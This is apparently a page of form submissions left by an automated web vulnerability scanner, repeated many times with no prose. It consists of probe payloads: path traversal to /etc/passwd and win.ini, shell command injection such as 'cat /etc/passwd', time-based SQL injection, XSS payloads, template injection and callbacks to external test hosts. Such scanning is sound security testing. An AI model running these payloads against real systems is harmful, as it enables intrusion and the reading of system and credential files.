/etc/passwd

-1))

1

1

http://hit5Ofluo7x30.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1_aJh9M <ScRiPt >prompt(904894)</ScRiPt>

comments

1

1

1

&dir

s3LjUOOV'

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

1

'&dir&'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

http://www.acunetix.tst

1

ug7bMFHM')

'"

1

1

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1'"()&%<ScRiPt >prompt(934653)</ScRiPt>

|dir

1

1

<!--

N1JJGuxB'))

1

'|dir

'"()&%<ScRiPt >prompt(936920)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

"|dir

1

1

1_923959

1

1

1

1

1

file:///etc/passwd

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8022\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8022

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux5051\xc0\xbez1\xc0\xbcz2a\x90bcxuca5051

1

................windowswin.ini

1

response.write(9327229*9623993)

1

1<ScRiPt >prompt(986319)</ScRiPt>

1

1

1

'+response.write(9327229*9623993)+'

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(964582)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(962729)</ScRiPt>

"+response.write(9327229*9623993)+"

1

1

1

1

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956855></ScRiPt>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<ScRiPt >prompt(957925)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1

1<video><source onerror="javascript:prompt(971849)">

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99547+99743}

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983888)"></g></svg>

`cat /etc/passwd`

WEB-INF/web.xml

-1

1

1some_inexistent_file_with_long_name%00.jpg

1<div style=width:expression(prompt(958952))>

1

1

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

|cat /etc/passwd#

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1&n934723=v940413

1

1<iframe src='data:text/html

1

'|'ld

1

-1))

testasp.vulnweb.com

1<body onload=prompt(934309)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

1

1

NuM5Woww'

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944941)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(949859)>

1

GfbsSygp')

1

'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

WBeb9H9e'))

1<img/src=">" onerror=alert(934077)>

'

/etc/passwd

1

1

"

1

1<ScRiPt%20>prompt(984949)</sCripT>

1

-1

1

"

1&lt

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

http://hitzlRcjAD24D.bxss.me/

1

||cat /etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

\xf6<img acu onmouseover=prompt(985735) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1<input autofocus onfocus=prompt(990427)>

&dir

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

1

comments

'"

<a href='http://www.acunetix.com'>website security</a>

'&dir&'

JBZnxr0P'

1

[url=http://www.acunetix.com]website security[/url]

<!--

1'"()&%<ScRiPt >prompt(909822)</ScRiPt>

comments/.

1

1_ETM7r <ScRiPt >prompt(957880)</ScRiPt>

file:///etc/passwd

1

1

BawavVdY')

1

1

'"()&%<ScRiPt >prompt(916976)</ScRiPt>

"&dir&"

1

1

bhZG11mh'))

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

1_917984

1

1

1

WEB-INF/web.xml

1

1

'|dir

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

acu9987\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9987

1

1

acux8551\xc0\xbez1\xc0\xbcz2a\x90bcxuca8551

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(913259)</ScRiPt>

1

1

1

1<script>prompt(919142)</script>

1

1<ScRiPt >prompt(988479)</ScRiPt>

response.write(9909845*9356457)

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9909845*9356457)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983199></ScRiPt>

&cat /etc/passwd&

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"+response.write(9909845*9356457)+"

1

'&cat /etc/passwd&'

1

1<ScRiPt >prompt(903456)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908405)">

"&cat /etc/passwd&"

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946844)"></g></svg>

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<div style=width:expression(prompt(999808))>

1

WEB-INF\web.xml

`cat /etc/passwd`

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

${99903+100362}

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(990235)>

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'|'ld

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981221)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

1<img src=xyz OnErRor=prompt(918881)>

1&n978654=v902162

"|"ld

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(937637)>

1

1

1

1

1

wsZlLy7O'

)

1<ScRiPt%20>prompt(972484)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'

SD3L0dgB')

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

testasp.vulnweb.com

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

"

1

L8u6jgkI'))

\xf6<img acu onmouseover=prompt(982577) //\xf6>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

1

||cat /etc/passwd

-1

1

"

1

1<input autofocus onfocus=prompt(927791)>

1

/etc/passwd

1

1

-1)

&dir

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitgLiIRDey0i.bxss.me/

'&dir&'

1

acunetix_wvs_invalid_filename

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"&dir&"

1

01lHkNsE'

1

comments

1_0SDlK <ScRiPt >prompt(974112)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

ACBqqupf')

|dir

1

http://www.acunetix.tst

1

1

'|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

OjWLPYDd'))

comments/.

1

1'"()&%<ScRiPt >prompt(926546)</ScRiPt>

'"

1

1

1

"|dir

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(985792)</ScRiPt>

1

1

file:///etc/passwd

1

1

1

1_951313

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu2430\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2430

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux10425\xc0\xbez1\xc0\xbcz2a\x90bcxuca10425

1

................windowswin.ini

1

1<ScRiPt >prompt(980377)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(976234)</script>

1

1

1<ScRiPt >prompt(985706)</ScRiPt>

response.write(9529702*9900880)

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

'+response.write(9529702*9900880)+'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960382></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

"+response.write(9529702*9900880)+"

1

1<video><source onerror="javascript:prompt(926670)">

&cat /etc/passwd&

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944944)"></g></svg>

1

1

1

'&cat /etc/passwd&'

1

1

1

1

1<div style=width:expression(prompt(998450))>

1

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(986678)>

${100422+100057}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1&n935527=v920956

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979542)>

1

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1<img src=xyz OnErRor=prompt(977982)>

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

'"()

1<img/src=">" onerror=alert(992098)>

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

DQia3ZwS'

'

1

1<ScRiPt%20>prompt(916329)</sCripT>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1&lt

YYDit9Bq')

"

1

/etc/passwd

'

1

1

m9gG54xk'))

\xf6<img acu onmouseover=prompt(992383) //\xf6>

1

http://hitrwptx4snSA.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

"

acunetix_wvs_invalid_filename

1

1

-1

1<input autofocus onfocus=prompt(952988)>

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

'"

comments/.

[url=http://www.acunetix.com]website security[/url]

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<!--

1

1

LYKbMwRA'

1

'&dir&'

1'"()&%<ScRiPt >prompt(994764)</ScRiPt>

1_Te3bD <ScRiPt >prompt(922555)</ScRiPt>

1

1

ZX1k6ydV')

1

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(918682)</ScRiPt>

1

1

F1QlcvAK'))

file:///etc/passwd

1

1

1

1_903897

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1

WEB-INF/web.xml

"|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

acu5278\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5278

1

..\..\..\..\..\..\..\..\windows\win.ini

response.write(9117638*9659347)

acux10175\xc0\xbez1\xc0\xbcz2a\x90bcxuca10175

'+response.write(9117638*9659347)+'

1

1

"+response.write(9117638*9659347)+"

1<ScRiPt >prompt(993723)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(900138)</script>

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(943799)</ScRiPt>

'&cat /etc/passwd&'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937664></ScRiPt>

1

1

1

"&cat /etc/passwd&"

1<ScRiPt >prompt(961199)</ScRiPt>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(965798)">

cat /etc/passwd

1

1

1

WEB-INF/web.xml

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990316)"></g></svg>

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1<div style=width:expression(prompt(990329))>

1

1

1

-1)

1

1

1

1<iframe src='data:text/html

'|'ld

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

-1))

1<body onload=prompt(980110)>

1

1

${99020+99074}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974281)>

5r5tbctn'

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n987400=v979816

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(977666)>

1

1

1some_inexistent_file_with_long_name%00.jpg

WG3qZ2o9')

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img/src=">" onerror=alert(999939)>

!(()&&!|*|*|

1

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

tukeNOt5'))

^(#$!@#$)(()))******

1<ScRiPt%20>prompt(913786)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

testasp.vulnweb.com

1

||cat /etc/passwd

/etc/passwd

'

1

1&lt

1

1

1

-1)

1

"

\xf6<img acu onmouseover=prompt(974139) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

${@print(md5(acunetix_wvs_security_test))}

-1))

1

http://hitJhY4eT4N5o.bxss.me/

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1<input autofocus onfocus=prompt(900979)>

G0LA1hiD'

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

"&dir&"

FTIusbFt')

1

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

|dir

1

p3V3mZgp'))

[url=http://www.acunetix.com]website security[/url]

1'"()&%<ScRiPt >prompt(942430)</ScRiPt>

'"

http://www.acunetix.tst

comments/.

1

1

1_aDHGM <ScRiPt >prompt(924238)</ScRiPt>

1

'|dir

1

1

<!--

'"()&%<ScRiPt >prompt(976476)</ScRiPt>

file:///etc/passwd

1

1

1

1

1

1

"|dir

1_974458

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acu5289\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5289

................windowswin.ini

1

1

1

1

1

1

acux4512\xc0\xbez1\xc0\xbcz2a\x90bcxuca4512

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(941292)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(903948)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(954168)</ScRiPt>

1

response.write(9294830*9266493)

1

1

'+response.write(9294830*9266493)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942767></ScRiPt>

1

"+response.write(9294830*9266493)+"

1

1<ScRiPt >prompt(931547)</ScRiPt>

&cat /etc/passwd&

1

1

1

1<video><source onerror="javascript:prompt(923275)">

1

'&cat /etc/passwd&'

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910591)"></g></svg>

1

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(989652))>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${99625+100411}

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

1

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1&n959728=v949297

1

1some_inexistent_file_with_long_name%00.jpg

1

1<body onload=prompt(994289)>

1

1

-1

|cat /etc/passwd#

)

../../../../../../../../../../etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962944)>

1

1

-1)

testasp.vulnweb.com

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

!(()&&!|*|*|

'"()

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<img src=xyz OnErRor=prompt(944011)>

1

1

"|"ld

'

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img/src=">" onerror=alert(946614)>

QmouNFmq'

1

1

"

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

h1cEAPHz')

1

1

1<ScRiPt%20>prompt(986441)</sCripT>

1

1

http://hitC0bYmKysU0.bxss.me/

'

${@print(md5(acunetix_wvs_security_test))}

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

QRnVI8mI'))

acunetix_wvs_invalid_filename

1

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/etc/passwd

comments

-1

\xf6<img acu onmouseover=prompt(935078) //\xf6>

1

1

||cat /etc/passwd

http://www.acunetix.tst

1

1

-1)

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(935015)>

comments/.

-1))

'"

&dir

1'"()&%<ScRiPt >prompt(969707)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(984879)</ScRiPt>

'&dir&'

<!--

1

WBSo0By7'

[url=http://www.acunetix.com]website security[/url]

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_957622

1

1

"&dir&"

1_DrSq5 <ScRiPt >prompt(933246)</ScRiPt>

1

1

1

1

4r6VZxPC')

|dir

1

1

fDvqgFGu'))

file:///etc/passwd

1

'|dir

acu10666\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10666

1

1

1

"|dir

acux4719\xc0\xbez1\xc0\xbcz2a\x90bcxuca4719

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1<ScRiPt >prompt(951659)</ScRiPt>

WEB-INF/web.xml

1

1

1

1<script>prompt(905400)</script>

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(992588)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963044></ScRiPt>

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(988159)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(928211)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990871)"></g></svg>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<div style=width:expression(prompt(934919))>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<iframe src='data:text/html

1

response.write(9964462*9865028)

................windowswin.ini

1

1

'+response.write(9964462*9865028)+'

1

1

1<body onload=prompt(951013)>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947781)>

1

&cat /etc/passwd&

"+response.write(9964462*9865028)+"

1<img src=xyz OnErRor=prompt(920801)>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1<img/src=">" onerror=alert(907264)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(983807)</sCripT>

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1&lt

1

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

${99490+100015}

1

\xf6<img acu onmouseover=prompt(924516) //\xf6>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF/web.xml

1

1

1

1

|cat /etc/passwd#

-1)

1

1<input autofocus onfocus=prompt(980289)>

WEB-INF\web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

)

1&n962397=v915707

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

-1))

1

1

'"()

"|"ld

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

9mwYB9bO'

1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

